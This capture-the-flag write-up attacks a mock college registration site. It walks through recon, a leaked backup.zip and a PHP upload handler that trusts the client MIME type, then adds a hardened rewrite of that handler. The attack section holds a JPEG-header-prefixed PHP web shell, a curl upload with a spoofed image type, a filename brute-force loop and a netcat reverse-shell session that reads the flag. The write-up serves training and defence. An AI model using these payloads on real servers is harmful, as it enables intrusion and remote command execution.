Recon
nmap

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.67 ((Debian))
|_http-title: Yekolo Temari College
|_http-server-header: Apache/2.4.67 (Debian)
```
FFUF

```
index.php
media
uploads
assets
student.php
.html
```
I enumerate each directory:

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media/FUZZ -ac -e .php,.html,.bak,.zip
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media//images/FUZZ -ac -e .php,.html,.bak,.zip
```
index.html points at something interesting in the assets directory:

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/assets/FUZZ -ac -e .php,.html,.bak,.zip
```
backup.zip. Download it and extract the contents:

```
└─$ wget http://uni.ctf/assets/backup.zip
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$ ls
backup.zip
┌──(neo㉿neo)-[~/uni-ctf/]
└─$ unzip backup.zip
Archive: backup.zip
   creating: backup/
  inflating: backup/index.php
  inflating: backup/student.php
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$ cd backup && ls
index.php student.php
┌──(neo㉿neo)-[~/uni-ctf/backup]
└─$
```
What we have now is the PHP upload logic:

```php
$ cat student.php
<?php
$message = '';
$status = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $name = trim($_POST['full_name'] ?? '');
    $email = trim($_POST['email'] ?? '');
    $department = trim($_POST['department'] ?? '');
    if (!isset($_FILES['student_image']) || $_FILES['student_image']['error'] !== UPLOAD_ERR_OK) {
        $message = 'Please upload your image.';
        $status = 'error';
    } else {
        $allowed = ['image/jpeg', 'image/png'];
        // The only type check: the MIME type reported by the client in the multipart request.
        $type = $_FILES['student_image']['type'] ?? '';
        if (!in_array($type, $allowed, true)) {
            $message = 'Only PNG or JPEG requeired.';
            $status = 'error';
        } else {
            $uploadDir = __DIR__ . '/uploads/';
            if (!is_dir($uploadDir)) {
                mkdir($uploadDir, 0777, true);
            }
            // The client-supplied filename (extension included) is kept, prefixed with a 3-digit random number.
            $originalName = basename($_FILES['student_image']['name']);
            $random = str_pad((string)random_int(100, 999), 3, '0', STR_PAD_LEFT);
            $savedName = 'yekolo-temari-' . $random . $originalName;
            $target = $uploadDir . $savedName;
            if (move_uploaded_file($_FILES['student_image']['tmp_name'], $target)) {
                $message = 'Thank you for registration we will contact u with your email';
                $status = 'success';
            } else {
                $message = 'Upload failed. Try again later.';
                $status = 'error';
            }
        }
    }
}
```
From this code we understand the process goes:
- Read form fields
- Check upload exists
- Check the MIME type reported by the client (never the file's actual contents)
- Create uploads/ if needed
- Rename the file (3-digit random prefix + the original filename, so the extension is kept)
- Move uploaded file
- Show success
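For comparison, here is how the same upload handler would look with the flaws above closed. This is an added example written for this writeup, not code from the challenge; it assumes the same form field names as student.php, a hypothetical upload directory outside the web root (`/var/www/uploads-private`), and PHP's fileinfo and GD extensions. The content type is sniffed from the bytes on disk, the image must actually decode, it is re-encoded (which strips anything appended to a valid header), and the stored name is chosen by the server.

```php
<?php
// Added example (not from the original writeup): a hardened version of the
// student.php upload handler. Assumed: the form fields of the original page,
// a hypothetical UPLOAD_DIR outside the document root, fileinfo and GD available.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads-private';   // hypothetical path, not served by Apache
const MAX_BYTES  = 2 * 1024 * 1024;               // 2 MiB is plenty for a passport photo

// Server-detected MIME type => extension the server will assign. The client's
// $_FILES[...]['type'] and original filename are never consulted.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate one entry of $_FILES. Returns the extension to store the file under,
 * or null if the upload must be rejected.
 */
function validate_image_upload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $tmp = $file['tmp_name'] ?? '';
    // Only accept a path that PHP itself created for this request.
    if (!is_string($tmp) || $tmp === '' || !is_uploaded_file($tmp)) {
        return null;
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        return null;
    }
    // Sniff the real content type from the file contents, not the multipart header.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!is_string($detected) || !isset(ALLOWED_TYPES[$detected])) {
        return null;
    }
    return ALLOWED_TYPES[$detected];
}

/**
 * Decode and re-encode the image into $dir under a random, server-chosen name.
 * A file that is only a JPEG header followed by script source does not decode
 * and is rejected here; a real image loses any trailing or embedded payload.
 * Returns the stored filename, or null on failure.
 */
function store_image(array $file, string $ext, string $dir): ?string
{
    $bytes = file_get_contents($file['tmp_name']);
    $img = $bytes === false ? false : @imagecreatefromstring($bytes);
    if ($img === false) {
        return null;
    }
    // 0750 instead of the original 0777: the web server user is the only writer.
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return null;
    }
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;   // unguessable; no brute-forcing the name
    $target = $dir . '/' . $name;
    $ok = $ext === 'png' ? imagepng($img, $target) : imagejpeg($img, $target, 90);
    return $ok ? $name : null;
}

$message = '';
$status  = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $name       = trim($_POST['full_name'] ?? '');
    $email      = trim($_POST['email'] ?? '');
    $department = trim($_POST['department'] ?? '');

    $upload = $_FILES['student_image'] ?? null;
    $ext    = is_array($upload) ? validate_image_upload($upload) : null;
    if ($ext === null) {
        $message = 'Please upload a valid PNG or JPEG image.';
        $status  = 'error';
    } elseif (store_image($upload, $ext, UPLOAD_DIR) !== null) {
        $message = 'Thank you for registering; we will contact you by email.';
        $status  = 'success';
    } else {
        $message = 'Upload failed. Try again later.';
        $status  = 'error';
    }
}
```

Validation alone is not the whole fix: the directory the files land in must also never execute code. Keeping it outside the document root (as above) and serving images through a small `readfile()` endpoint with a fixed `Content-Type` is the simplest way; if the directory has to stay under the web root, disable PHP there (for Apache with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for it). With both in place, the 900-request name brute-force and the `?cmd=` web shell seen below would have nowhere to run.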
shell.php

```
\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>
```

```bash
echo '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>' > shell.php
```

```bash
curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@shell.php;type=image/jpeg" http://uni.ctf/student.php
```
```bash
for i in $(seq 100 999); do
    url="http://uni.ctf/uploads/yekolo-temari-${i}shell.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done
```

```
[+] Found: http://uni.ctf/uploads/yekolo-temari-996shell.php
```
?cmd=id

```
─$ curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@pentest.php;type=image/jpeg" http://uni.ctf/student.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Student Registration</title>
<style>
body{font-family:Arial,sans-serif;background:#f8fafc;padding:30px;color:#1e293b}
.wrap{max-width:780px;margin:0 auto;background:#fff;border-radius:16px;padding:28px;box-shadow:0 10px 30px rgba(0,0,0,.08)}
label{display:block;margin:14px 0 8px;font-weight:700}
input,select{width:100%;padding:12px;border:1px solid #cbd5e1;border-radius:10px}
button{margin-top:18px;background:#2563eb;color:#fff;border:0;padding:12px 18px;border-radius:10px;cursor:pointer}
.msg{margin-bottom:16px;padding:14px;border-radius:10px}
.success{background:#dcfce7;color:#166534}
.error{background:#fee2e2;color:#991b1b}
a{color:#2563eb}
</style>
</head>
<body>
<div class="wrap">
<h1>Yekolo Temari College Registration</h1>
<p>Fill the form below and upload your passport-size photo.</p>
<div class="msg success">Thank you for registration we will contact u with your email</div>
<form method="POST" enctype="multipart/form-data">
<label>Full Name</label>
<input type="text" name="full_name" required>
<label>Email</label>
<input type="email" name="email" required>
<label>Department</label>
<select name="department" required>
<option value="Computer Science">Computer Science</option>
<option value="Civil Engineering">Civil Engineering</option>
<option value="Business Management">Business Management</option>
<option value="Nursing">Nursing</option>
<option value="CyberSecurity">CyberSecurity</option>
</select>
<label>Profile Image (JPEG or PNG)</label>
<input type="file" name="student_image" required>
<button type="submit">Submit Registration</button>
</form>
<p style="margin-top:20px"><a href="/index.php">Back to homepage</a></p>
</div>
</body>
</html>
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do
    url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done
^C
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do
    url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done
```
```
─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.8] 34012
Linux 49e853df1514 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux
 01:08:30 up 22:38,  0 users,  load average: 0.34, 0.37, 0.34
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
dev
etc
flag.txt
home
...
var
$ cat flag.txt
unictf{Br34king_TH3_rul3s}
```